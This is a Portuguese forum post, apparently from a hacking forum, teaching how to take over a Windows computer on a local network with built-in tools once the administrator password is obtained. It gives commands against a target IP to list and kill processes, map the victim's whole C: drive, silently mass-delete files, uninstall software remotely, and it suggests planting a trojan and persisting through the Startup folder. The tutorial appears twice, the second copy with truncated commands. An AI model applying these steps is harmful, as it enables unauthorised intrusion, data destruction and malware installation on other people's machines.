Quando digo sem programas, é algo meio figurado, o que quero dizer realmente é que não será usado nenhum programa além dos que já vem no Windows, ou seja, CMD e tals.. (SIM, CMD é um programa '-' )
Bom, a parte chata é que esse tutorial tem alguns requisitos
Por que tudo isso?
Simples, o windows não vem com ferramentas pra hacking, isso é apenas uma adaptação das ferramentas nativas do windows e que de fato vou me limitar somente ao que vem no windows, mas pra quem quiser potencializar o ataque, sugiro dar uma olhada no [Tens de ter uma conta e sessão iniciada para poderes visualizar este link], uma suite de ferramentas da própria microsoft pra um gerenciamento mais avançado do computador, onde vc pode manipular tanto um computador local quanto remoto em questões como o que inicia com o sistema, usuários, gerenciar processos, etc..
Pulando então os requisitos vamos la
~le PC atacante IP = 192.168.254.10
~le PC alvo IP = 192.168.254.88
Listando e finalizando processos do computador Invadido
Algo que pode ser útil é poder gerenciar processos do computador remoto, ou seja, listar, finalizar e criar processos, no nosso, caso podemos apenas listar e finalizar
Pra Listar existe o comando tasklist que permite ver os processos ativos com ou sem detalhes, depende das flags que vc passar pro comando..
no caso vou apenas usar a opção /s /u e /p que basicamente serve pra executar o tasklist no computador remoto
* se vc informar o /s, mas não o /u e /p, quando ele se conectar, vai pedir o login e senha do mesmo jeito
então o comando seria basicamente este
tasklist /s /u /p
No meu caso
tasklist /s 192.168.254.88 /u administrador /p 12345
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
ou
tasklist /s 192.168.254.88 /u administrador /p 12345
onde a opção /v vai listar mais detalhes sobre os processos
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
e pra concluir vamos finalizar o processo que eu marquei em vermelho
pra isso existe outro comando, o tasklist ele permite finalizar processos no computador local e remoto, ele funciona semelhante ao tasklist, bastando passar tasklist /s e o nome do computador alvo
aqui vou finalizar usando o PID, então:
taskkill /s /PID /u /p
No meu caso
taskkill /s 192.168.254.8 /PID 3720 /u administrador /p 12345
e é isso ai
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Acessando os arquivos do computador invadido
Aqui a coisa começa a ficar mais interessante, pois podemos baixar/enviar/editar arquivos, pra isso vamos simplesmente fazer com que o HD dele, seja um mapeamento de rede
Nessa parte um bom comando é o net use, como quero mapear a unidade inteira do cara, uso+$
net use /user:
No meu caso
net use X: \\192.168.254.88\C$ /user:administrador 12345
Depois disso, no computador do atacante, será criada uma unidade X que é a unidade mapeada do computador alvo
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Como o usuário logado é o administrador, vc tem acesso a todas as pastas e a partir daqui vc pode usar a imaginação, plantando algum outro vírus no computador do cara, como por exemplo, substituir o atalho do navegador, por um trojan e tals..
outra coisa interessante é você por arquivos para iniciar com o sistema, pra isso basta mover o arquivo/atalho do arquivo pra pasta startup do windows, que no windows 7 é :
C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Deletando arquivos em massa do computador remoto
Isso ja é mais cara de BR, invadir pra apagar tudo kk, bom aqui vc pode acessar graficamente a unidade la que vc mapeou e apagar o que quiser, mas se vc quiser, pode fazer pelo cmd tbm, usando aqueles velhos comandos de del e tals...
No meu caso vou excluir todos os arquivos .tmp da unidade C:\ do computador invadido, que agora é a unidade X do meu PC
* vou excluir os arquivos temporário, mas obviamente ai vc pode excluir o que quiser, ou melhor, o que seu usuário tiver permissão pra excluir
Então aqui usei o comando
del /s /f /q X:\*.tmp
ou seja, excluir de forma silenciosa, recursiva e forçada todos arquivos .tmp da unidade X
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Obtendo informações sobre o sistema operacional do computador
Algo que dependendo da situação pode ser útil, é obter dados do sistema, como quando o sistema foi instalado, quais patchs de segurança estão instalados e até mesmo desde quando o computador esta ligado..
Pra isso podemos usar o comando systeminfo
a sintaxe lembra o tasklist, pois pasta vc passar a opção /s e o computador alvo
systeminfo /s /u /p
No meu caso
systeminfo /s 192.168.254.88 /u administrador /p 12345
#ignorem o | more no print, isso é só pra exibir a saída do comando de forma mais "calma", sem sair aquele monte de informação de uma vez, a informação vai sendo exibida conforme vc tecla enter
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Listar/Remover programas instalados no computador remoto
Aqui ja vamos começar a brincar além do CMD, usando [Tens de ter uma conta e sessão iniciada para poderes visualizar este link], que pode-se dizer que ele e o [Tens de ter uma conta e sessão iniciada para poderes visualizar este link], é a versão adulta do CMD kk
pra começar, vamos listar os programas instalados no computador
/user: /password: /node: product get name,version,vendor,identifyingNumber
no caso essas opções de name, version, etc.. são mais pra detalhar as informações, se vc passar só o name, já vai retornar o nome dos programas
No meu caso usei :
/user:administrador /password:12345 /node:192.168.254.88 product get name,version,vendor,identifyingNumber
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Então temos ai a lista de programas instalados, mas de fato, o wmic nunca me retornou a lista completa de programas instalados, alguns realmente ele não mostra, não sei porque..
Continuando, vamos remover o java
pra isso mudamos apenas do product pra frente..
/user: /password: /node: product where name="" call uninstall
No meu caso
/user:administrador /password:12345 /node:192.168.254.88 product where name="Java 8 Update 45" call uninstall
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
#um detalhe, na frente do comando pra remover o programa vc pode por /nointeractive pra não exibir uma mensagem na tela (na sua tela e não na tela do computador remoto) perguntando se vc quer continuar ou não, ele remove direto
Enfim cara, com WMI vc faz mta coisa, vc pode gerenciar varias coisas, vale a pena dar uma estudada
aqui um help do programa
wmic:root\cli>/?
[global switches]
The following global switches are available:
/NAMESPACE Path for the namespace the alias operate against.
/ROLE Path for the role containing the alias definitions.
/NODE Servers the alias will operate against.
/IMPLEVEL Client impersonation level.
/AUTHLEVEL Client authentication level.
/LOCALE Language id the client should use.
/PRIVILEGES Enable or disable all privileges.
/TRACE Outputs debugging information to stderr.
/RECORD Logs all input commands and output.
/INTERACTIVE Sets or resets the interactive mode.
/FAILFAST Sets or resets the FailFast mode.
/USER User to be used during the session.
/PASSWORD Password to be used for session login.
/OUTPUT Specifies the mode for output redirection.
/APPEND Specifies the mode for output redirection.
/AGGREGATE Sets or resets aggregate mode.
/AUTHORITY Specifies the for the connection.
/?[:] Usage information.
For more information on a specific global switch, type: switch-name /?
The following alias/es are available in the current role:
ALIAS - Access to the aliases available on the local system
BASEBOARD - Base board (also known as a motherboard or system board) management.
BIOS - Basic input/output services (BIOS) management.
BOOTCONFIG - Boot configuration management.
CDROM - CD-ROM management.
COMPUTERSYSTEM - Computer system management.
CPU - CPU management.
CSPRODUCT - Computer system product information from SMBIOS.
DATAFILE - DataFile Management.
DCOMAPP - DCOM Application management.
DESKTOP - User's Desktop management.
DESKTOPMONITOR - Desktop Monitor management.
DEVICEMEMORYADDRESS - Device memory addresses management.
DISKDRIVE - Physical disk drive management.
DISKQUOTA - Disk space usage for NTFS volumes.
DMACHANNEL - Direct memory access (DMA) channel management.
ENVIRONMENT - System environment settings management.
FSDIR - Filesystem directory entry management.
GROUP - Group account management.
IDECONTROLLER - IDE Controller management.
IRQ - Interrupt request line (IRQ) management.
JOB - Provides access to the jobs scheduled using the schedule service.
LOADORDER - Management of system services that define execution dependencies.
LOGICALDISK - Local storage device management.
LOGON - LOGON Sessions.
MEMCACHE - Cache memory management.
MEMORYCHIP - Memory chip information.
MEMPHYSICAL - Computer system's physical memory management.
NETCLIENT - Network Client management.
NETLOGIN - Network login information (of a particular user) management.
NETPROTOCOL - Protocols (and their network characteristics) management.
NETUSE - Active network connection management.
NIC - Network Interface Controller (NIC) management.
NICCONFIG - Network adapter management.
NTDOMAIN - NT Domain management.
NTEVENT - Entries in the NT Event Log.
NTEVENTLOG - NT eventlog file management.
ONBOARDDEVICE - Management of common adapter devices built into the motherboard (system board).
OS - Installed Operating System/s management.
PAGEFILE - Virtual memory file swapping management.
PAGEFILESET - Page file settings management.
PARTITION - Management of partitioned areas of a physical disk.
PORT - I/O port management.
PORTCONNECTOR - Physical connection ports management.
PRINTER - Printer device management.
PRINTERCONFIG - Printer device configuration management.
PRINTJOB - Print job management.
PROCESS - Process management.
PRODUCT - Installation package task management.
QFE - Quick Fix Engineering.
QUOTASETTING - Setting information for disk quotas on a volume.
RDACCOUNT - Remote Desktop connection permission management.
RDNIC - Remote Desktop connection management on a specific network adapter.
RDPERMISSIONS - Permissions to a specific Remote Desktop connection.
RDTOGGLE - Turning Remote Desktop listener on or off remotely.
RECOVEROS - Information that will be gathered from memory when the operating system fails.
REGISTRY - Computer system registry management.
SCSICONTROLLER - SCSI Controller management.
SERVER - Server information management.
SERVICE - Service application management.
SHADOWCOPY - Shadow copy management.
SHADOWSTORAGE - Shadow copy storage area management.
SHARE - Shared resource management.
SOFTWAREELEMENT - Management of the elements of a software product installed on a system.
SOFTWAREFEATURE - Management of software product subsets of SoftwareElement.
SOUNDDEV - Sound Device management.
STARTUP - Management of commands that run automatically when users log onto the computer system.
SYSACCOUNT - System account management.
SYSDRIVER - Management of the system driver for a base service.
SYSTEMENCLOSURE - Physical system enclosure management.
SYSTEMSLOT - Management of physical connection points including ports, slots and peripherals, and proprietary connections points.
TAPEDRIVE - Tape drive management.
TEMPERATURE - Data management of a temperature sensor (electronic thermometer).
TIMEZONE - Time zone data management.
UPS - Uninterruptible power supply (UPS) management.
USERACCOUNT - User account management.
VOLTAGE - Voltage sensor (electronic voltmeter) data management.
VOLUME - Local storage volume management.
VOLUMEQUOTASETTING - Associates the disk quota setting with a specific disk volume.
VOLUMEUSERQUOTA - Per user storage volume quota management.
WMISET - WMI service operational parameters management.
For more information on a specific alias, type: alias /?
CLASS - Escapes to full WMI schema.
PATH - Escapes to full WMI object paths.
CONTEXT - Displays the state of all the global switches.
QUIT/EXIT - Exits the program.
For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?
wmic:root\cli>
e dois links bons sobre wmi
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Enfim, não é tão pratico como alguns tipos de invasão, não tem mto point-click nessa parte, nem recursos mto avançados, mas a ideia é demonstrar que hacker não é feito de ferramentas hacker, é feito de conhecimento, conhecimento que lhe permite usar tudo a sua volta como algo que possa vir a ser útil na sua tarefa..
em outras palavras...
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Bom, a parte chata é que esse tutorial tem alguns requisitos
- Ter o usuário e senha do administrador do computador remoto(isso existem várias formas de conseguir, tanto local quanto remotamente, remoto existem programas como hydra, módulos do metasploit e até mesmo um script que eu criei [Tens de ter uma conta e sessão iniciada para poderes visualizar este link])
- O firewall do computador remoto deve estar inativo
- de preferência ter o RDP/area de trabalho remota ativo no computador remoto
- Isso se aplica a apenas quando o computador esta na mesma rede ou na DMZ de outra rede
Por que tudo isso?
Simples, o windows não vem com ferramentas pra hacking, isso é apenas uma adaptação das ferramentas nativas do windows e que de fato vou me limitar somente ao que vem no windows, mas pra quem quiser potencializar o ataque, sugiro dar uma olhada no [Tens de ter uma conta e sessão iniciada para poderes visualizar este link], uma suite de ferramentas da própria microsoft pra um gerenciamento mais avançado do computador, onde vc pode manipular tanto um computador local quanto remoto em questões como o que inicia com o sistema, usuários, gerenciar processos, etc..
Pulando então os requisitos vamos la
~le PC atacante IP = 192.168.254.10
~le PC alvo IP = 192.168.254.88
Listando e finalizando processos do computador Invadido
Algo que pode ser útil é poder gerenciar processos do computador remoto, ou seja, listar, finalizar e criar processos, no nosso, caso podemos apenas listar e finalizar
Pra Listar existe o comando tasklist que permite ver os processos ativos com ou sem detalhes, depende das flags que vc passar pro comando..
no caso vou apenas usar a opção /s /u e /p que basicamente serve pra executar o tasklist no computador remoto
* se vc informar o /s, mas não o /u e /p, quando ele se conectar, vai pedir o login e senha do mesmo jeito
então o comando seria basicamente este
tasklist /s
No meu caso
tasklist /s 192.168.254.88 /u administrador /p 12345
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
ou
tasklist /s 192.168.254.88 /u administrador /p 12345
onde a opção /v vai listar mais detalhes sobre os processos
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
e pra concluir vamos finalizar o processo que eu marquei em vermelho
pra isso existe outro comando, o tasklist ele permite finalizar processos no computador local e remoto, ele funciona semelhante ao tasklist, bastando passar tasklist /s e o nome do computador alvo
aqui vou finalizar usando o PID, então:
taskkill /s
No meu caso
taskkill /s 192.168.254.8 /PID 3720 /u administrador /p 12345
e é isso ai
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Acessando os arquivos do computador invadido
Aqui a coisa começa a ficar mais interessante, pois podemos baixar/enviar/editar arquivos, pra isso vamos simplesmente fazer com que o HD dele, seja um mapeamento de rede
Nessa parte um bom comando é o net use, como quero mapear a unidade inteira do cara, uso
net use
No meu caso
net use X: \\192.168.254.88\C$ /user:administrador 12345
Depois disso, no computador do atacante, será criada uma unidade X que é a unidade mapeada do computador alvo
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Como o usuário logado é o administrador, vc tem acesso a todas as pastas e a partir daqui vc pode usar a imaginação, plantando algum outro vírus no computador do cara, como por exemplo, substituir o atalho do navegador, por um trojan e tals..
outra coisa interessante é você por arquivos para iniciar com o sistema, pra isso basta mover o arquivo/atalho do arquivo pra pasta startup do windows, que no windows 7 é :
C:\Users\
Deletando arquivos em massa do computador remoto
Isso ja é mais cara de BR, invadir pra apagar tudo kk, bom aqui vc pode acessar graficamente a unidade la que vc mapeou e apagar o que quiser, mas se vc quiser, pode fazer pelo cmd tbm, usando aqueles velhos comandos de del e tals...
No meu caso vou excluir todos os arquivos .tmp da unidade C:\ do computador invadido, que agora é a unidade X do meu PC
* vou excluir os arquivos temporário, mas obviamente ai vc pode excluir o que quiser, ou melhor, o que seu usuário tiver permissão pra excluir
Então aqui usei o comando
del /s /f /q X:\*.tmp
ou seja, excluir de forma silenciosa, recursiva e forçada todos arquivos .tmp da unidade X
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Obtendo informações sobre o sistema operacional do computador
Algo que dependendo da situação pode ser útil, é obter dados do sistema, como quando o sistema foi instalado, quais patchs de segurança estão instalados e até mesmo desde quando o computador esta ligado..
Pra isso podemos usar o comando systeminfo
a sintaxe lembra o tasklist, pois pasta vc passar a opção /s e o computador alvo
systeminfo /s
No meu caso
systeminfo /s 192.168.254.88 /u administrador /p 12345
#ignorem o | more no print, isso é só pra exibir a saída do comando de forma mais "calma", sem sair aquele monte de informação de uma vez, a informação vai sendo exibida conforme vc tecla enter
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Listar/Remover programas instalados no computador remoto
Aqui ja vamos começar a brincar além do CMD, usando [Tens de ter uma conta e sessão iniciada para poderes visualizar este link], que pode-se dizer que ele e o [Tens de ter uma conta e sessão iniciada para poderes visualizar este link], é a versão adulta do CMD kk
pra começar, vamos listar os programas instalados no computador
/user:
no caso essas opções de name, version, etc.. são mais pra detalhar as informações, se vc passar só o name, já vai retornar o nome dos programas
No meu caso usei :
/user:administrador /password:12345 /node:192.168.254.88 product get name,version,vendor,identifyingNumber
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Então temos ai a lista de programas instalados, mas de fato, o wmic nunca me retornou a lista completa de programas instalados, alguns realmente ele não mostra, não sei porque..
Continuando, vamos remover o java
pra isso mudamos apenas do product pra frente..
/user:
No meu caso
/user:administrador /password:12345 /node:192.168.254.88 product where name="Java 8 Update 45" call uninstall
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
#um detalhe, na frente do comando pra remover o programa vc pode por /nointeractive pra não exibir uma mensagem na tela (na sua tela e não na tela do computador remoto) perguntando se vc quer continuar ou não, ele remove direto
Enfim cara, com WMI vc faz mta coisa, vc pode gerenciar varias coisas, vale a pena dar uma estudada
aqui um help do programa
wmic:root\cli>/?
[global switches]
The following global switches are available:
/NAMESPACE Path for the namespace the alias operate against.
/ROLE Path for the role containing the alias definitions.
/NODE Servers the alias will operate against.
/IMPLEVEL Client impersonation level.
/AUTHLEVEL Client authentication level.
/LOCALE Language id the client should use.
/PRIVILEGES Enable or disable all privileges.
/TRACE Outputs debugging information to stderr.
/RECORD Logs all input commands and output.
/INTERACTIVE Sets or resets the interactive mode.
/FAILFAST Sets or resets the FailFast mode.
/USER User to be used during the session.
/PASSWORD Password to be used for session login.
/OUTPUT Specifies the mode for output redirection.
/APPEND Specifies the mode for output redirection.
/AGGREGATE Sets or resets aggregate mode.
/AUTHORITY Specifies the
/?[:
For more information on a specific global switch, type: switch-name /?
The following alias/es are available in the current role:
ALIAS - Access to the aliases available on the local system
BASEBOARD - Base board (also known as a motherboard or system board) management.
BIOS - Basic input/output services (BIOS) management.
BOOTCONFIG - Boot configuration management.
CDROM - CD-ROM management.
COMPUTERSYSTEM - Computer system management.
CPU - CPU management.
CSPRODUCT - Computer system product information from SMBIOS.
DATAFILE - DataFile Management.
DCOMAPP - DCOM Application management.
DESKTOP - User's Desktop management.
DESKTOPMONITOR - Desktop Monitor management.
DEVICEMEMORYADDRESS - Device memory addresses management.
DISKDRIVE - Physical disk drive management.
DISKQUOTA - Disk space usage for NTFS volumes.
DMACHANNEL - Direct memory access (DMA) channel management.
ENVIRONMENT - System environment settings management.
FSDIR - Filesystem directory entry management.
GROUP - Group account management.
IDECONTROLLER - IDE Controller management.
IRQ - Interrupt request line (IRQ) management.
JOB - Provides access to the jobs scheduled using the schedule service.
LOADORDER - Management of system services that define execution dependencies.
LOGICALDISK - Local storage device management.
LOGON - LOGON Sessions.
MEMCACHE - Cache memory management.
MEMORYCHIP - Memory chip information.
MEMPHYSICAL - Computer system's physical memory management.
NETCLIENT - Network Client management.
NETLOGIN - Network login information (of a particular user) management.
NETPROTOCOL - Protocols (and their network characteristics) management.
NETUSE - Active network connection management.
NIC - Network Interface Controller (NIC) management.
NICCONFIG - Network adapter management.
NTDOMAIN - NT Domain management.
NTEVENT - Entries in the NT Event Log.
NTEVENTLOG - NT eventlog file management.
ONBOARDDEVICE - Management of common adapter devices built into the motherboard (system board).
OS - Installed Operating System/s management.
PAGEFILE - Virtual memory file swapping management.
PAGEFILESET - Page file settings management.
PARTITION - Management of partitioned areas of a physical disk.
PORT - I/O port management.
PORTCONNECTOR - Physical connection ports management.
PRINTER - Printer device management.
PRINTERCONFIG - Printer device configuration management.
PRINTJOB - Print job management.
PROCESS - Process management.
PRODUCT - Installation package task management.
QFE - Quick Fix Engineering.
QUOTASETTING - Setting information for disk quotas on a volume.
RDACCOUNT - Remote Desktop connection permission management.
RDNIC - Remote Desktop connection management on a specific network adapter.
RDPERMISSIONS - Permissions to a specific Remote Desktop connection.
RDTOGGLE - Turning Remote Desktop listener on or off remotely.
RECOVEROS - Information that will be gathered from memory when the operating system fails.
REGISTRY - Computer system registry management.
SCSICONTROLLER - SCSI Controller management.
SERVER - Server information management.
SERVICE - Service application management.
SHADOWCOPY - Shadow copy management.
SHADOWSTORAGE - Shadow copy storage area management.
SHARE - Shared resource management.
SOFTWAREELEMENT - Management of the elements of a software product installed on a system.
SOFTWAREFEATURE - Management of software product subsets of SoftwareElement.
SOUNDDEV - Sound Device management.
STARTUP - Management of commands that run automatically when users log onto the computer system.
SYSACCOUNT - System account management.
SYSDRIVER - Management of the system driver for a base service.
SYSTEMENCLOSURE - Physical system enclosure management.
SYSTEMSLOT - Management of physical connection points including ports, slots and peripherals, and proprietary connections points.
TAPEDRIVE - Tape drive management.
TEMPERATURE - Data management of a temperature sensor (electronic thermometer).
TIMEZONE - Time zone data management.
UPS - Uninterruptible power supply (UPS) management.
USERACCOUNT - User account management.
VOLTAGE - Voltage sensor (electronic voltmeter) data management.
VOLUME - Local storage volume management.
VOLUMEQUOTASETTING - Associates the disk quota setting with a specific disk volume.
VOLUMEUSERQUOTA - Per user storage volume quota management.
WMISET - WMI service operational parameters management.
For more information on a specific alias, type: alias /?
CLASS - Escapes to full WMI schema.
PATH - Escapes to full WMI object paths.
CONTEXT - Displays the state of all the global switches.
QUIT/EXIT - Exits the program.
For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?
wmic:root\cli>
e dois links bons sobre wmi
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Enfim, não é tão pratico como alguns tipos de invasão, não tem mto point-click nessa parte, nem recursos mto avançados, mas a ideia é demonstrar que hacker não é feito de ferramentas hacker, é feito de conhecimento, conhecimento que lhe permite usar tudo a sua volta como algo que possa vir a ser útil na sua tarefa..
em outras palavras...
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]